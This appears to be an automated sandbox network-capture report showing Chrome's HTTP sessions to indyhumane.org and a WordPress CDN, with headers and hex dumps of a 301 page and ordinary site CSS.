                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:51.591407061 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                        Data Ascii:


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        1192.168.2.449741199.16.172.26802044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:51.107083082 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                        Data Ascii:


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        0192.168.2.449743199.16.172.264432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:07 UTC657OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                        Host: indyhumane.org
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                        Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:08 UTC552INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:08 GMT
                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Host-Header: wpcloud
                                                                                                                                                                                                                                                        Vary: Cookie
                                                                                                                                                                                                                                                        Link: <https://indyhumane.org/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                                                                        Link: <https://indyhumane.org/wp-json/wp/v2/pages/8385>; rel="alternate"; title="JSON"; type="application/json"
                                                                                                                                                                                                                                                        Link: <https://indyhumane.org/>; rel=shortlink
                                                                                                                                                                                                                                                        X-ac: 1.jfk _atomic_dca BYPASS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        2025-01-09 01:59:08 UTC817INData Raw: 37 64 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 37 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 38 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 63 6c 61 73 73 3d 22 74 63 62 22 3e 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55
                                                                                                                                                                                                                                                        Data Ascii: 7dd<!DOCTYPE html>...[if IE 7]><html class="ie ie7" lang="en-US"><![endif]-->...[if IE 8]><html class="ie ie8" lang="en-US"><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang="en-US"class="tcb">...<![endif]--><head><meta charset="U
                                                                                                                                                                                                                                                        2025-01-09 01:59:08 UTC1369INData Raw: 5f 63 6f 6e 74 61 69 6e 65 72 20 2e 74 76 65 5f 6c 67 5f 6e 75 6d 62 65 72 20 69 6e 70 75 74 7b 66 6c 65 78 3a 20 31 20 31 20 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 20 31 30 30 25 3b 7d 2e 74 68 72 76 5f 6c 65 61 64 5f 67 65 6e 65 72 61 74 69 6f 6e 5f 63 6f 6e 74 61 69 6e 65 72 20 2e 74 76 65 5f 6c 67 5f 6e 75 6d 62 65 72 20 2e 74 68 72 76 5f 66 69 65 6c 64 5f 77 72 61 70 70 65 72 7b 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 66 6c 65 78 3a 20 30 20 30 20 31 30 30 25 3b 7d 2e 74 68 72 76 5f 6c 65 61 64 5f 67 65 6e 65 72 61 74 69 6f 6e 5f 63 6f 6e 74 61 69 6e 65 72 20 2e 74 76 65 5f 6c 67 5f 6e 75 6d 62 65 72 20 2e 74 68 72 76 5f 66 69 65 6c 64 5f 77 72 61 70 70 65 72 20 2b 20 2e 74 68 72 76 5f 74 65
                                                                                                                                                                                                                                                        Data Ascii: _container .tve_lg_number input{flex: 1 1 0%;max-width: 100%;}.thrv_lead_generation_container .tve_lg_number .thrv_field_wrapper{position: relative;display: flex;flex: 0 0 100%;}.thrv_lead_generation_container .tve_lg_number .thrv_field_wrapper + .thrv_te
                                                                                                                                                                                                                                                        2025-01-09 01:59:08 UTC1369INData Raw: 35 2c 38 35 29 3b 2d 2d 74 63 62 2d 61 70 70 6c 69 65 64 2d 63 6f 6c 6f 72 3a 20 23 35 35 35 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 52 6f 62 6f 74 6f 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 2e 74 68 72 76 5f 77 72 61 70 70 65 72 2e 74 68 72 76 5f 6c 65 61 64 5f 67 65 6e 65 72 61 74 69 6f 6e 20 2e 74 76 65 5f 6c 65 61 64 5f 67 65 6e 65 72 61 74 65 64 5f 69 6e 70 75 74 73 5f 63 6f 6e 74 61 69 6e 65 72 20 69 6e 70 75 74 5b 74 79 70 65 3d 22 65 6d 61 69 6c 22 5d 2c 2e 74 68 72 76 5f 77 72 61 70 70 65 72 2e 74 68 72 76 5f 6c 65 61 64 5f 67 65 6e 65 72 61 74 69 6f 6e 20 2e 74 76 65 5f 6c 65 61 64 5f 67 65 6e 65 72 61 74 65 64 5f 69 6e 70 75 74 73 5f 63 6f 6e 74 61 69 6e 65 72 20 69 6e 70 75 74 5b 74 79 70 65 3d 22 74 65 78 74 22 5d 7b 70 61 64 64 69 6e 67 3a
                                                                                                                                                                                                                                                        Data Ascii: 5,85);--tcb-applied-color: #555;font-family: Roboto,sans-serif;}.thrv_wrapper.thrv_lead_generation .tve_lead_generated_inputs_container input[type="email"],.thrv_wrapper.thrv_lead_generation .tve_lead_generated_inputs_container input[type="text"]{padding:
                                                                                                                                                                                                                                                        2025-01-09 01:59:08 UTC1369INData Raw: 72 76 5f 6c 65 61 64 5f 67 65 6e 65 72 61 74 69 6f 6e 5f 63 6f 6e 74 61 69 6e 65 72 20 2e 74 76 65 5f 6c 67 5f 69 6e 70 75 74 5f 63 6f 6e 74 61 69 6e 65 72 2e 74 76 65 5f 6c 67 5f 69 6e 70 75 74 20 3e 20 69 6e 70 75 74 7b 6d 61 72 67 69 6e 3a 20 30 70 78 3b 7d 2e 74 68 72 76 5f 77 72 61 70 70 65 72 2e 74 68 72 76 5f 6c 65 61 64 5f 67 65 6e 65 72 61 74 69 6f 6e 2e 74 76 65 2d 6c 65 61 64 2d 67 65 6e 65 72 61 74 69 6f 6e 2d 74 65 6d 70 6c 61 74 65 20 2e 74 68 72 76 5f 6c 65 61 64 5f 67 65 6e 65 72 61 74 69 6f 6e 5f 63 6f 6e 74 61 69 6e 65 72 20 2e 74 76 65 5f 6c 67 5f 69 6e 70 75 74 5f 63 6f 6e 74 61 69 6e 65 72 2e 74 76 65 5f 6c 67 5f 74 65 78 74 61 72 65 61 7b 6d 61 72 67 69 6e 3a 20 31 30 70 78 20 30 70 78 3b 7d 2e 74 68 72 76 5f 77 72 61 70 70 65 72 2e
                                                                                                                                                                                                                                                        Data Ascii: rv_lead_generation_container .tve_lg_input_container.tve_lg_input > input{margin: 0px;}.thrv_wrapper.thrv_lead_generation.tve-lead-generation-template .thrv_lead_generation_container .tve_lg_input_container.tve_lg_textarea{margin: 10px 0px;}.thrv_wrapper.
                                                                                                                                                                                                                                                        2025-01-09 01:59:08 UTC1369INData Raw: 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 77 69 64 74 68 3a 20 31 30 30 25 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 74 68 72 76 5f 6c 65 61 64 5f 67 65 6e 65 72 61 74 69 6f 6e 5f 63 6f 6e 74 61 69 6e 65 72 20 69 6e 70 75 74 5b 74 79 70 65 3d 22 70 61 73 73 77 6f 72 64 22 5d 3a 3a 70 6c 61 63 65 68 6f 6c 64 65 72 2c 2e 74 68 72 76 5f 6c 65 61 64 5f 67 65 6e 65 72 61 74 69 6f 6e 5f 63 6f 6e 74 61 69 6e 65 72 20 69 6e 70 75 74 5b 74 79 70 65 3d 22 65 6d 61 69 6c 22 5d 3a 3a 70 6c 61 63 65 68 6f 6c 64 65 72 2c 2e 74 68 72 76 5f 6c 65 61 64 5f 67 65 6e 65 72 61 74 69 6f 6e 5f 63 6f 6e 74 61 69 6e 65 72 20 69 6e 70 75 74 5b 74 79 70 65 3d 22 75 72 6c 22 5d 3a 3a 70 6c 61 63 65 68 6f 6c 64 65 72 2c 2e 74 68 72 76 5f 6c 65 61 64 5f 67 65 6e 65 72 61 74 69 6f 6e
                                                                                                                                                                                                                                                        Data Ascii: ne !important;width: 100% !important;}.thrv_lead_generation_container input[type="password"]::placeholder,.thrv_lead_generation_container input[type="email"]::placeholder,.thrv_lead_generation_container input[type="url"]::placeholder,.thrv_lead_generation
                                                                                                                                                                                                                                                        2025-01-09 01:59:08 UTC1369INData Raw: 61 79 3a 20 6e 6f 6e 65 3b 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 77 69 64 74 68 3a 20 31 30 30 25 3b 68 65 69 67 68 74 3a 20 31 30 30 25 3b 74 6f 70 3a 20 30 70 78 3b 6c 65 66 74 3a 20 30 70 78 3b 7d 73 70 61 6e 2e 74 63 62 2d 66 6f 72 6d 2d 6c 6f 61 64 65 72 2d 69 63 6f 6e 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 30 2e 37 73 20 6c 69 6e 65 61 72 20 30 73 20 69 6e 66 69 6e 69 74 65 20 6e 6f 72 6d 61 6c 20 6e 6f 6e 65 20 72 75 6e 6e 69 6e 67 20 74 63 62 2d 6c 6f 61 64 65 72 3b 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 68 65 69 67 68 74 3a 20 32 34 70 78 3b 77 69 64 74 68 3a 20 32 34 70 78 3b 70 6f 73 69 74 69 6f 6e 3a
                                                                                                                                                                                                                                                        Data Ascii: ay: none;position: absolute;width: 100%;height: 100%;top: 0px;left: 0px;}span.tcb-form-loader-icon{animation: 0.7s linear 0s infinite normal none running tcb-loader;display: inline-block;font-size: 24px;line-height: 24px;height: 24px;width: 24px;position:
                                                                                                                                                                                                                                                        2025-01-09 01:59:08 UTC1369INData Raw: 76 65 5f 6c 67 5f 72 61 64 69 6f 5f 77 72 61 70 70 65 72 20 2e 74 76 65 2d 6c 67 2d 65 72 72 6f 72 3a 6e 6f 74 28 3a 63 68 65 63 6b 65 64 29 20 2b 20 6c 61 62 65 6c 3a 6e 6f 74 28 3a 68 6f 76 65 72 29 20 2b 20 2e 74 76 65 2d 63 68 65 63 6b 6d 61 72 6b 2c 2e 74 76 65 2d 6e 65 77 2d 72 61 64 69 6f 20 2e 74 76 65 5f 6c 67 5f 72 61 64 69 6f 5f 77 72 61 70 70 65 72 20 2e 74 76 65 2d 6c 67 2d 65 72 72 6f 72 3a 6e 6f 74 28 3a 63 68 65 63 6b 65 64 29 20 2b 20 6c 61 62 65 6c 3a 6e 6f 74 28 3a 68 6f 76 65 72 29 20 2e 74 76 65 2d 63 68 65 63 6b 6d 61 72 6b 2c 2e 74 76 65 2d 6e 65 77 2d 63 68 65 63 6b 62 6f 78 20 2e 74 76 65 5f 6c 67 5f 63 68 65 63 6b 62 6f 78 5f 77 72 61 70 70 65 72 20 2e 74 76 65 2d 6c 67 2d 65 72 72 6f 72 3a 6e 6f 74 28 3a 63 68 65 63 6b 65 64 29
                                                                                                                                                                                                                                                        Data Ascii: ve_lg_radio_wrapper .tve-lg-error:not(:checked) + label:not(:hover) + .tve-checkmark,.tve-new-radio .tve_lg_radio_wrapper .tve-lg-error:not(:checked) + label:not(:hover) .tve-checkmark,.tve-new-checkbox .tve_lg_checkbox_wrapper .tve-lg-error:not(:checked)
                                                                                                                                                                                                                                                        2025-01-09 01:59:08 UTC1369INData Raw: 29 20 30 70 78 20 30 70 78 20 34 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 74 63 62 2d 66 69 6c 65 2d 6c 69 73 74 20 2e 74 63 62 2d 66 69 6c 65 2d 6c 6f 61 64 65 72 20 2e 74 63 62 2d 66 6f 72 6d 2d 6c 6f 61 64 65 72 2d 69 63 6f 6e 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 36 70 78 3b 77 69 64 74 68 3a 20 31 36 70 78 3b 68 65 69 67 68 74 3a 20 31 36 70 78 3b 6d 61 72 67 69 6e 3a 20 2d 38 70 78 20 30 70 78 20 30 70 78 20 2d 38 70 78 3b 7d 2e 74 68 72 76 2d 70 61 67 65 2d 73 65 63 74 69 6f 6e 7b 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 74 68 72 76 2d 70 61 67 65 2d 73 65 63 74 69
                                                                                                                                                                                                                                                        Data Ascii: ) 0px 0px 4px !important;}.tcb-file-list .tcb-file-loader .tcb-form-loader-icon{font-size: 16px;line-height: 16px;width: 16px;height: 16px;margin: -8px 0px 0px -8px;}.thrv-page-section{position: relative;box-sizing: border-box !important;}.thrv-page-secti
                                                                                                                                                                                                                                                        2025-01-09 01:59:08 UTC1369INData Raw: 2d 68 65 69 67 68 74 3a 20 31 65 6d 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 20 30 3b 73 74 72 6f 6b 65 3a 20 63 75 72 72 65 6e 74 63 6f 6c 6f 72 3b 66 69 6c 6c 3a 20 63 75 72 72 65 6e 74 63 6f 6c 6f 72 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 76 61 72 28 2d 2d 74 63 62 2d 69 63 6f 6e 2d 72 6f 74 61 74 69 6f 6e 2d 61 6e 67 6c 65 2c 30 64 65 67 29 29 3b 7d 73 76 67 2e 74 63 62 2d 69 63 6f 6e 20 70 61 74 68 3a 6e 6f 74 28 5b 66 69 6c 6c 3d 22 6e 6f 6e 65 22 5d 29 7b 74 72 61 6e 73 69 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 66 69 6c 6c 3a 20 69 6e 68 65 72 69 74 20 21 69 6d 70 6f 72 74 61 6e 74 3b 73 74 72 6f
                                                                                                                                                                                                                                                        Data Ascii: -height: 1em;vertical-align: middle;stroke-width: 0;stroke: currentcolor;fill: currentcolor;box-sizing: content-box;transform: rotate(var(--tcb-icon-rotation-angle,0deg));}svg.tcb-icon path:not([fill="none"]){transition: none;fill: inherit !important;stro
                                                                                                                                                                                                                                                        2025-01-09 01:59:08 UTC1369INData Raw: 62 6c 6f 63 6b 3b 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 7d 2e 74 76 65 5f 69 6d 61 67 65 5f 63 61 70 74 69 6f 6e 7b 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 7d 2e 74 76 65 5f 69 6d 61 67 65 5f 63 61 70 74 69 6f 6e 3a 6e 6f 74 28 2e 74 63 62 2d 6d 6d 2d 69 6d 61 67 65 2e 74 76 65 2d 74 61 62 2d 69 6d 61 67 65 29 7b 68 65 69 67 68 74 3a 20 61 75 74 6f 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 74 76 65 5f 69 6d 61 67 65 5f 63 61 70 74 69 6f 6e 20 2e 74 76 65 5f 69 6d 61 67 65 7b 6d 61 78 2d 77 69 64 74 68 3a 20 31 30 30 25 3b 77 69 64 74 68 3a 20 31 30 30 25 3b 7d 2e 74 63 62 2d 73 74 79 6c 65 2d 77 72 61 70 20 73 74 72 6f 6e 67 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 76 61 72 28 2d 2d 67 2d 62 6f 6c 64 2d 77 65 69 67 68 74 2c 62 6f 6c 64
                                                                                                                                                                                                                                                        Data Ascii: block;padding: 0px;}.tve_image_caption{position: relative;}.tve_image_caption:not(.tcb-mm-image.tve-tab-image){height: auto !important;}.tve_image_caption .tve_image{max-width: 100%;width: 100%;}.tcb-style-wrap strong{font-weight: var(--g-bold-weight,bold


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        1192.168.2.449745192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC599OUTGET /wp-includes/css/dist/block-library/style.min.css?ver=6.7.1 HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC627INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:09 GMT
                                                                                                                                                                                                                                                        Content-Type: text/css
                                                                                                                                                                                                                                                        Content-Length: 114706
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-includes/css/dist/block-library/style.min.css>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Thu, 07 Nov 2024 16:05:23 GMT
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=315360000
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 2.jfk _atomic_dca MISS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: MISS jfk 1
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC742INData Raw: 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 2e 77 70 2d 62 6c 6f 63 6b 2d 61 72 63 68 69 76 65 73 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 61 72 63 68 69 76 65 73 2d 64 72 6f 70 64 6f 77 6e 20 6c 61 62 65 6c 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 61 76 61 74 61 72 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 30 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 61 76 61 74 61 72 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 61 76 61 74 61 72 20 69 6d 67 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 61 76 61 74 61 72 2e 61 6c 69 67 6e 63 65 6e 74 65 72 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 61
                                                                                                                                                                                                                                                        Data Ascii: @charset "UTF-8";.wp-block-archives{box-sizing:border-box}.wp-block-archives-dropdown label{display:block}.wp-block-avatar{line-height:0}.wp-block-avatar,.wp-block-avatar img{box-sizing:border-box}.wp-block-avatar.aligncenter{text-align:center}.wp-block-a
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC1369INData Raw: 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5b 73 74 79 6c 65 2a 3d 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 5d 20 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 69 6e 68 65 72 69 74 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 73 3e 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 2e 68 61 73 2d 63 75 73 74 6f 6d 2d 77 69 64 74 68 7b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 73 3e 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 2e 68 61 73 2d 63 75 73 74 6f 6d 2d 77 69 64 74 68 20 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 7b 77 69 64 74 68 3a
                                                                                                                                                                                                                                                        Data Ascii: xt-decoration:none}.wp-block-button[style*=text-decoration] .wp-block-button__link{text-decoration:inherit}.wp-block-buttons>.wp-block-button.has-custom-width{max-width:none}.wp-block-buttons>.wp-block-button.has-custom-width .wp-block-button__link{width:
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC1369INData Raw: 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 29 7b 62 6f 72 64 65 72 3a 32 70 78 20 73 6f 6c 69 64 3b 70 61 64 64 69 6e 67 3a 2e 36 36 37 65 6d 20 31 2e 33 33 33 65 6d 7d 3a 72 6f 6f 74 20 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 20 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 2e 69 73 2d 73 74 79 6c 65 2d 6f 75 74 6c 69 6e 65 3a 6e 6f 74 28 2e 68 61 73 2d 74 65 78 74 2d 63 6f 6c 6f 72 29 29 2c 3a 72 6f 6f 74 20 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 2e 69 73 2d 73 74 79 6c 65 2d 6f 75 74 6c 69 6e 65 3e 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 3a 6e 6f 74 28 2e 68 61 73 2d 74 65 78 74 2d 63 6f 6c 6f 72 29 29 7b 63 6f 6c 6f 72 3a 63
                                                                                                                                                                                                                                                        Data Ascii: .wp-block-button__link){border:2px solid;padding:.667em 1.333em}:root :where(.wp-block-button .wp-block-button__link.is-style-outline:not(.has-text-color)),:root :where(.wp-block-button.is-style-outline>.wp-block-button__link:not(.has-text-color)){color:c
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC1369INData Raw: 74 69 66 69 63 61 74 69 6f 6e 2d 72 69 67 68 74 2c 2e 69 73 2d 63 6f 6e 74 65 6e 74 2d 6a 75 73 74 69 66 69 63 61 74 69 6f 6e 2d 6c 65 66 74 2c 2e 69 73 2d 63 6f 6e 74 65 6e 74 2d 6a 75 73 74 69 66 69 63 61 74 69 6f 6e 2d 63 65 6e 74 65 72 29 20 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 2e 61 6c 69 67 6e 63 65 6e 74 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 73 5b 73 74 79 6c 65 2a 3d 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 5d 20 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 73 5b 73 74 79 6c 65 2a 3d 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f
                                                                                                                                                                                                                                                        Data Ascii: tification-right,.is-content-justification-left,.is-content-justification-center) .wp-block-button.aligncenter{margin-left:auto;margin-right:auto;width:100%}.wp-block-buttons[style*=text-decoration] .wp-block-button,.wp-block-buttons[style*=text-decoratio
